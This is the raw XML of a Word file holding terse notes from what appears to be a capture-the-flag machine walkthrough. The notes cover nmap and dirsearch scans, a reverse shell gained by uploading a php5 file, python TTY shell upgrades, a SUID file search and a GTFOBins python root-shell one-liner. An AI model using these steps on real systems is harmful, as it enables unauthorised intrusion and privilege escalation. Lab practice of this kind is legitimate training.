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7D21A" w14:textId="20ED445F" w:rsidR="00866465" w:rsidRDefault="0018398D">
      <w:r w:rsidRPr="0018398D">
        <w:t xml:space="preserve">nmap -sV -sS 10.10.80.96  -vv  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964B106" w14:textId="20F8AC77" w:rsidR="0018398D" w:rsidRDefault="006C1429">
      <w:r w:rsidRPr="006C1429">
        <w:t>dirsearch -u 10.10.80.96</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD1CFB" w14:textId="5C850787" w:rsidR="00B26432" w:rsidRDefault="00B26432">
      <w:r>
        <w:t>(hacktool reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="006B2571">
        <w:t xml:space="preserve"> by uploading php5</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1558E210" w14:textId="417AD86F" w:rsidR="00B26432" w:rsidRDefault="00B26432"/>
    <w:p w14:paraId="20CE0241" w14:textId="1A39289E" w:rsidR="00C67023" w:rsidRDefault="00C67023"/>
    <w:p w14:paraId="1DD8074C" w14:textId="47EC68E3" w:rsidR="00C67023" w:rsidRDefault="00C67023">
      <w:r>
        <w:t>python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  (get shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380B4D7" w14:textId="4118CD11" w:rsidR="001E2CA1" w:rsidRDefault="001E2CA1">
      <w:r w:rsidRPr="001E2CA1">
        <w:t>find / -type f -name user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FDDE3" w14:textId="3F1CFAC2" w:rsidR="00B037C8" w:rsidRDefault="00B037C8">
      <w:r>
        <w:t>find / -user root -perm /4000 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidR="00846681">
        <w:t xml:space="preserve"> (searching root permission files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2F894" w14:textId="53734E9B" w:rsidR="00846681" w:rsidRDefault="00846681">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00BE7784">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">   (searching command for getting sudo access by python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877DE28" w14:textId="77777777" w:rsidR="00914D18" w:rsidRPr="00914D18" w:rsidRDefault="00914D18" w:rsidP="00914D18">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FF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4D18">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BF0707"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>python -c 'import os; os.execl("/bin/sh", "sh", "-p")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B6701" w14:textId="68EDC6B8" w:rsidR="00914D18" w:rsidRDefault="00914D18"/>
    <w:p w14:paraId="1FDAB576" w14:textId="03D51603" w:rsidR="002D4997" w:rsidRDefault="002D4997" w:rsidP="002D4997">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
      <w:r w:rsidR="00631356">
        <w:t xml:space="preserve"> (to get shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED737D" w14:textId="77777777" w:rsidR="002D4997" w:rsidRDefault="002D4997"/>
    <w:p w14:paraId="69D54886" w14:textId="77777777" w:rsidR="00B26432" w:rsidRDefault="00B26432"/>
    <w:sectPr w:rsidR="00B26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04F"/>
    <w:rsid w:val="0018398D"/>
    <w:rsid w:val="001E2CA1"/>
    <w:rsid w:val="002D4997"/>
    <w:rsid w:val="00631356"/>
    <w:rsid w:val="006B2571"/>
    <w:rsid w:val="006C1429"/>
    <w:rsid w:val="00846681"/>
    <w:rsid w:val="00866465"/>
    <w:rsid w:val="00914D18"/>
    <w:rsid w:val="00A3004F"/>
    <w:rsid w:val="00B037C8"/>
    <w:rsid w:val="00B26432"/>
    <w:rsid w:val="00C67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0D662"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4CDA113F-0C99-4F91-9403-4DFB35632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66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668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4D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4D1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14D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tfobins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2023-12-01T16:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-01T16:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>